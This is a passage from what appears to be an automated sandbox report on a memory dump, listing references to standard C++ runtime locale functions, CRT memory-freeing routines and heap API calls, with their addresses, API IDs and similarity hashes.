                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
